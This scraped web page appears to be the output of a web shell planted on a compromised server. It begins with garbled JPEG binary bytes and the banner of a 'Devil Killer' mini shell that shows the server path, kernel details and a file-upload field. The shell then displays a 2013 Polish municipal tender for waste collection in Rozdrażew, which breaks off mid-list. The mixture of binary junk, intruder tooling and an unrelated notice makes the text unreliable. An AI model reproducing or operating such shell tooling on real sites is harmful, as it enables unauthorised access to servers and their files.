JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130619/117715-N-2013.html

<p class="kh_header"><b>Rozdrażew: Odbiór, transport i zagospodarowanie  odpadów komunalnych pochodzących od właścicieli nieruchomości zamieszkałych na terenie gminy Rozdrażew</b><br>
<b>Numer ogłoszenia: 117715 - 2013; data zamieszczenia: 19.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rozdrażew , ul. Rynek 3, 63-708 Rozdrażew, woj. wielkopolskie, tel. 062 7221305, faks 062 7221370.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór, transport i zagospodarowanie  odpadów komunalnych pochodzących od właścicieli nieruchomości zamieszkałych na terenie gminy Rozdrażew.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
- odbiór z wszystkich nieruchomości zamieszkałych na terenie gminy, transport i zagospodarowanie odpadów zmieszanych,
- odbiór z wszystkich nieruchomości zamieszkałych na terenie gminy, transport i zagospodarowanie odpadów segregowanych zebranych w workach bądź pojemnikach do segregacji odpadów 
- dostarczenie do wszystkich nieruchomości zamieszkałych worków do selektywnej zbiórki odpadów,
- odbiór odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego                 - raz w trakcie obowiązywania umowy,   
-  odbiór, transport i zagospodarowanie odpadów komunalnych zbieranych w sposób selektywny              w ramach mobilnego punktu zbiórki odpadów,  
-  odbiór z punktów zbiórki przeterminowanych leków i baterii oraz odbiór  zebranych odpadów transport i zagospodarowanie.  
- odbiór na zgłoszenie Zamawiającego odpadów  
Odbiór odpadów zmieszanych i segregowanych odbywać się będzie zgodnie z zasadami określonymi w: 
- ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2012r. poz. 391) oraz w ustawie   z dnia 14 grudnia 2012r. o odpadach ( Dz.U.z 2012r.poz.21
- uchwale Nr XXVI/154/2013 Rady Gminy Rozdrażew. z dnia 12 marca 2013r.
w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi - stanowiącej załącznik nr 3 do SIWZ.
- uchwale Nr XXVI/156/2013 Rady  Gminy Rozdrażew z dnia 12 marca 2013r.
w sprawie uchwalenia regulaminu utrzymania czystości i porządku na terenie gminy Rozdrażew.
- stanowiącej załącznik nr 4 do SIWZ.

A/ odbiór z wszystkich nieruchomości zamieszkałych na terenie gminy, transport i zagospodarowanie odpadów zmieszanych
Wykonawca będzie zobowiązany do odbioru odpadów zmieszanych z wszystkich nieruchomości zamieszkałych na terenie gminy. Zgodnie z regulaminem utrzymania czystości i porządku na terenie gminy Rozdrażew odpady zmieszane gromadzone będą w pojemnikach o pojemnościach  120l, 240l,  770l. Obowiązek wyposażenia nieruchomości w pojemniki do odpadów zmieszanych leży po stronie właściciela nieruchomości. 

B/ odbiór z wszystkich nieruchomości zamieszkałych na terenie gminy, transport i zagospodarowanie odpadów segregowanych
Wykonawca będzie zobowiązany do odbioru selektywnie gromadzonych odpadów z wszystkich nieruchomości zamieszkałych na terenie gminy. 
Selektywna zbiórka odpadów na nieruchomościach zamieszkałych, na których zlokalizowanych jest nie więcej niż siedem lokali prowadzona będzie w systemie workowym. Odpady gromadzone będą w pięciu workach:
- tworzywa sztuczne, metale i opakowania wielomateriałowe - worek żółty,
- papier i tektura - worek niebieski,
- szkło bezbarwne  - worek biały,
-  szkło kolorowe - worek zielony,
-  odpady zielone (części roślin pochodzących z pielęgnacji terenów zielonych) - worek brązowy.

W przypadku nieruchomości, na których zlokalizowanych jest więcej niż siedem lokali odpady zbierane selektywnie gromadzone będą pojemnikach typu dzwon lub siatkowy o pojemności 1,5 - 3,0 m3 i workach:
- szkło bezbarwne - pojemnik typu dzwon, kolor biały,
-  szkła kolorowego - pojemnik typu dzwon, kolor zielony, 
- tworzyw sztucznych, metali, opakowań wielomateriałowych  - pojemnik siatkowy, kolor żółty,
-  papieru i tektury - pojemnik siatkowy lub worki, kolor niebieski,
- odpadów zielonych - worek brązowy.

C/ dostarczenie do wszystkich nieruchomości zamieszkałych worków do selektywnej zbiórki odpadów
Wykonawca będzie zobowiązany do dostarczenia worków do selektywnej zbiórki odpadów                     o następujących parametrach:
1) worek żółty, o minimalnej pojemności 120 l wykonany z folii polietylenowych LDPE
lub HDPE, umożliwiający identyfikację zawartych w nich odpadów - do zbierania tworzyw
sztucznych, metali i opakowań wielomateriałowych,
2) worek niebieski, o minimalnej pojemności 120 l, wykonany z folii LDPE lub HDPE,
umożliwiający identyfikację zawartych w nich odpadów - do zbierania papieru i tektury,
3) worek biały, o minimalnej pojemności 80 l, wykonany z folii polietylenowych LDPE
lub HDPE, umożliwiający identyfikację zawartych w nich odpadów - do zbierania szkła
bezbarwnego,
4) worek zielony, o minimalnej pojemności 80 l, wykonany z folii polietylenowych LDPE
lub HDPE, umożliwiający identyfikację zawartych w nich odpadów - do zbierania szkła
kolorowego,
5) worek brązowy, o minimalnej pojemności 120 l, wykonany z folii polietylenowych LDPE
lub HDPE, umożliwiający identyfikację zawartych w nich odpadów - do zbierania odpadów
zielonych (części roślin pochodzących z pielęgnacji terenów zielonych),

Wykonawca zobowiązany jest dostarczyć worki do selektywnej zbiórki odpadów w następujący sposób:
1) w terminie do 10 lipca 2013r. do wszystkich nieruchomości zamieszkałych, których właściciele zadeklarowali zbiórkę odpadów w sposób selektywny w oparciu o listę przekazaną przez Zamawiającego. Szacunkowa ilość - po 1.000szt w pięciu kolorach, 
2) w terminie do 15 lipca 2013r. do siedziby zamawiającego w celu udostepnienia właścicielom nieruchomości w okresie pomiędzy terminami zbiórki odpadów w przypadku zwiększonego zapotrzebowania. Wymagana ilość: po 300szt. worków na oba rodzaje szkła i tworzywa sztuczne oraz po 100szt. worków na odpady zielone, papier i tekturę.
3) w terminach odbioru odpadów zbieranych selektywnie do wszystkich nieruchomości, których właściciele zadeklarowali zbiórkę odpadów w sposób selektywny.  Przy każdorazowym odbiorze odpadów selektywnie zebranych, Wykonawca winien dostarczyć nowe worki w ilości i rodzaju odpowiadające liczbie odebranych worków.

Wykonawca jest zobowiązany w ramach niniejszego zamówienia do zapewnienia właścicielom nieruchomości zamieszkałych na których zlokalizowanych jest więcej niż siedem lokali worków  do zbierania odpadów zielonych oraz papieru i tektury. 

D/ odbiór odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego   i elektronicznego 
W okresie obowiązywania umowy Wykonawca zobowiązany będzie od jednorazowego przeprowadzenia zbiórki z terenu wszystkich nieruchomości zamieszkałych odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego, wystawionego przed posesję (w formie tzw. wystawki). O terminie przeprowadzenia zbiórki objazdowej Wykonawca zobowiązany jest powiadomić właścicieli nieruchomości oraz Zamawiającego.

E/ odbiór, transport i zagospodarowanie odpadów komunalnych zbieranych w sposób selektywny w ramach mobilnego punktu zbiórki odpadów.  
Wykonawca zobowiązany będzie do przeprowadzenia raz w kwartale mobilnego punktu zbierania odpadów. W tym celu Wykonawca przeprowadzi zbiórkę odpadów w ustaloną   sobotę  w miejscu wskazanym  przez Zamawiającego na terenie miejscowości Rozdrażew w godz. 9.00 do 15.00
Rodzaje odpadów objętych zbiórką
zużyty sprzęt elektryczny i elektroniczny;
odpady wielkogabarytowe
przeterminowane leki i chemikalia, w ilości do 10 kg łącznie od jednego mieszkańca rocznie
przenośne baterii i akumulatory,
zużyte opony,  w ilości do 6 szt. od jednego mieszkańca rocznie
odpady budowlane i rozbiórkowe, w ilości do 150 kg od jednego mieszkańca rocznie.
papier i tekturę;
tworzywa sztuczne, opakowania wielomateriałowe, metale;
szkło (bezbarwne i kolorowe);
odpady zielone;
pozostałe odpady problemowe (np. świetlówki, żarówki, szyby, porcelana).
  
F/  odbiór z punktów zbiórki przeterminowanych leków , baterii i przenośnych akumulatorów.  
Wykonawca będzie zobowiązany do odbioru przeterminowanych leków z aptek oraz odbioru baterii i przenośnych akumulatorów z placówek oświatowych i siedziby Urzędu Gminy.
Na dzień 1 lipca 2013r. zbiórką objęte będą następujące punkty:
- apteki przy ul. Krotoszyńskiej 9 i ul. Koźmińskiej w Rozdrażewie,
- Zespoły Szkół Publicznych w Nowej Wsi i Rozdrażewie (ul. Krotoszyńska 42),
- Urząd Gminy Rozdrażew - budynek przy ul. Rynek 1.
Pojemniki do zbiórki stanowią własność Zamawiającego. Zamawiający nie przewiduje zmiany wysokości wynagrodzenia w przypadku zgłoszenia się do udziału w zbiórce kolejnych aptek. 
G/ odbiór odpadów komunalnych budowlanych ,rozbiórkowych i zielonych
- Wykonawca zobowiązany jest do odbierania z kontenerów o pojemności 7m3odpadów budowlanych i rozbiórkowych innych niż niebezpieczne, a także odpadów zielonych pochodzących z gospodarstw domowych z wyznaczonego przez Zamawiającego miejsca tj. na terenie miejscowości Rozdrażew..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>odbiór,transport i zagospodarowanie ok.200 ton odpadów zmieszanych i 20 ton odpadów segregowanych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium
1. Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości 10 .000,00 zł (słownie: dziesięćtysięcyzłotych 00/100).
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
     a) pieniądzu, przelewem na rachunek bankowy Zamawiającego wskazany
         w punkcie 3 niniejszego rozdziału,
     b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy
         oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
     c) gwarancjach bankowych,
     d) gwarancjach ubezpieczeniowych,
     e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2000 Nr 109, poz. 1158, ze zm.).
 3. Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Urząd Gminy Rozdrażew
     Bank Spółdzielczy Dobrzyca O/Rozdrażew
     numer konta: 78 8409 000 102 000 2152 0000001
     Na poleceniu przelewu należy wpisać: Wadium - Odbiór , transport i zagospodarowanie  odpadów komunalnych z terenu gminy Rozdrażew.
     Jeżeli wadium wniesione zostanie w pieniądzu przelewem, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu.
4. Wadium w pieniądzu musi być wniesione przed upływem terminu do składania ofert
      tj. do dnia  26.06.2013 r. do godz. 9.30.
5. W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy 
     Zamawiającego wskazany w punkcie 3 niniejszego rozdziału.
6. W przypadku wnoszenia wadium w innych formach niż w pieniądzu, wymagane jest dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego i złożenie    w kasie Urzędu Gminy, najpóźniej w terminie złożenia ofert. Kopię poświadczoną        za zgodność z oryginałem  należy załączyć do oferty.
     Dokumenty, o których mowa w punkcie 2.b-e. muszą zachować ważność przez cały okres, w którym Wykonawca jest związany ofertą.
7.  Wykonawca, którego oferta nie będzie zabezpieczona wadium odpowiadającym   
     powyższym  wymaganiom, zostanie wykluczony z ubiegania się o udzielenie zamówienia.                                     
 8.  Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty   najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego  oferta wybrana jako najkorzystniejsza, z zastrzeżeniem ust.4a ustawy PZP.                                                 
  9.  Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami
       wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej  za  przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana :
      a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
          określonych w ofercie;
      b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
      c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, o których mowa w art.22 ust.1 i nie podlegają wykluczeniu na podstawie art.24 ustawy PZP dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesji zezwolenia  lub licencji.
2) Posiadania wypisu do rejestru działalności regulowanej, o której mowa w art. 9b ustawy  z dnia 13 września 1996r (Dz.U.z 2012r poz 391 z późn. zm.) o utrzymaniu czystości  i porządku w gminach, prowadzonego przez właściwy organ, w zakresie objętym przedmiotem zamówienia oraz w art. 51 ust. 1 pkt 6 ustawy z dnia 14 grudnia 2012r. (Dz.U.  z 2012r. Poz. 21) o odpadach, obejmujący co najmniej rodzaje i kody odpadów komunalnych, wymienionych poniżej
Kategoria odpadu	Kod odpadu
zmieszane odpady komunalne	20 03 01
szkło	15 01 07, 15 01 06, 20 01 02
papier	15 01 01, 15 01 06, 20 01 01
metale	15 01 04, 15 01 06, 20 01 40
tworzywa sztuczne	15 01 02, 15 01 06, 20 01 39
opakowania wielomateriałowe	15 01 05, 15 01 06
Odpady biodegradowalne (zielone)	20 02 01
przeterminowane leki i chemikalia	20 01 31*, 20 01 32, 20 01 13*, 20 01 14*, 20 01 15*, 20 01 27*, 20 01 28, 20 01 30, 20 01 19*, 20 01 80
Zużyte przenośne baterie i akumulatory	20 01 33*, 20 01 34
Zużyty sprzęt elektryczny i elektroniczny	20 01 21*,20 01 23*, 20 01 35*, 20 01 36
Odpady wielkogabarytowe	20 03 07
Odpady budowlane i rozbiórkowe inne niż niebezpieczne	17 01 01, 17 01 02, 17 01 03, 17 01 07
opony	16 01 03</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia  
a) wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych , głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/ nie spełnia
Wykonawca winien złożyć wykaz narzędzi, wyposażenia zakładu i urządzeń
technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz       z informacją o podstawie do dysponowania tymi zasobami. Wykonawca musi wykazać,   że (załącznik nr 4 do SIWZ):
a) dysponuje lub będzie dysponować samochodami specjalistycznymi      i samochodem ciężarowym, spełniającymi wymagania techniczne określone
przepisami ustawy prawo o ruchu drogowym oraz innymi przepisami
szczególnymi, w ilości (łącznej):
- co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych    z pojemników 1201, 240 1 i 7701, 
- co   najmniej   jeden  pojazd  przystosowany  do   odbierania odpadów  selektywnie zebranych w workach,
- co najmniej  jeden samochód  ciężarowy przystosowany  do odbioru  odpadów wielkogabarytowych,
- co najmniej jeden samochód przystosowany do odbioru odpadów segregowanych  z pojemników typu dzwon, kontenerów oraz pojemników siatkowych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/ nie spełnia
posiada lub będzie posiadać odpowiednią do przedmiotu zamówienia, bazę transportową   z zapleczem technicznym , spełniającą wymagania przepisów budowlanych, sanitarnych  i ochrony środowiska oraz zaplecze biurowe  umożliwiające codzienny kontakt Wykonawcy   z przedstawicielem Zamawiającego.
 c) Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi wykaz wymaganego sprzętu opisanego powyżej i złoży oświadczenie o posiadaniu lub prawie  do posiadania bazy transportowej z zapleczem techniczno-biurowym opisanej powyżej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/ nie spełnia
Wykonawca winien złożyć informację banku lub spółdzielczej kasy
oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków
finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej          niż 3 miesiące przed upływem terminu składania ofert w postępowaniu o udzielenie
zamówienia;
Zamawiający uzna warunek za spełniony, gdy wykazane zostanie posiadanie środków finansowych lub zdolność kredytowa w wysokości nie niższej niż  300 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

